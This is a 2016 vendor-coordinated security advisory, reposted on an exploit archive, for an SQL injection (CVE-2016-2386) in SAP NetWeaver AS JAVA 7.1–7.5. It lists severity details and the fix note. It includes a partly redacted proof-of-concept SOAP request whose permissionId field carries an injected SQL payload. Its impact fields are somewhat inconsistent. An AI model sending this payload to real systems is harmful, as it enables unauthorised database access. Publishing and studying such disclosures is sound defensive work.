SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection

2016-05-19T00:00:00
ID 1337DAY-ID-25051
Type zdt
Reporter ERPScan
Modified 2016-05-19T00:00:00

Description

Exploit for java platform in category web applications

                                        
                                            Application:  SAP NetWeaver AS JAVA
Versions Affected:  SAP NetWeaver  AS JAVA 7.1 - 7.5
Vendor URL:    http://SAP.com
Bugs:    SQL injection
Send:     04.12.2015
Reported: 04.12.2015
Vendor response:  05.12.2015
Date of Public Advisory:   09.02.2016
Reference:   SAP Security Note 2101079
Author:    Vahagn Vardanyan  (ERPScan)
 
 
Description
 
1. ADVISORY INFORMATION
 
Title: SAP NetWeaver AS JAVA – SQL injection vulnerability
Advisory ID: [ERPSCAN-16-011]
Risk: Critical
Advisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/
Date published: 09.02.2016
Vendors contacted: SAP
 
 
2. VULNERABILITY INFORMATION
 
Class: SQL injection
 
Impact: Resource consumption
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: 2016-2386
CVSS Information
CVSS Base Score v3:  9.1 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Low (L)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality High (H)
I  : Impact to Integrity High(H)
A : Impact to Availability None (N)
 
 
3. VULNERABILITY DESCRIPTION
 
An SQL injection vulnerability means that a code comprises an SQL
statement that contains strings that can be altered by an attacker.
The manipulated SQL statement can be used to gain additional data from
the database or to modify the information.
 
 
4. VULNERABLE PACKAGES
 
SAP NetWeaver AS JAVA 7.1 - 7.5
 
Other versions are probably affected too, but they were not checked.
 
 
5. SOLUTIONS AND WORKAROUNDS
 
To correct this vulnerability, install SAP Security Note 2101079
 
 
6. AUTHOR
 
Vahagn Vardanyan  (ERPScan)
 
 
7. TECHNICAL DESCRIPTION
 
By exploiting this vulnerability, an internal or external attacker can
escalate their privileges. This access allows obtaining sensitive
technical and business-related information stored in the vulnerable
SAP system.
 
 
PoC
 
POST /XXX/UDDISecurityImplBean HTTP/1.1
Content-Type: text/xml
 
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  XXX
 
<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or
'1'='1</permissionId>
 
XXX
 
</SOAP-ENV:Envelope>
 
 
8. REPORT TIMELINE
 
Sent:   04.12.2015
Reported:    04.12.2015
Vendor response:   05.12.2015
Date of Public Advisory:   09.02.2016
 
 
9. REFERENCES
 
https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/

#  0day.today [2018-03-14]  #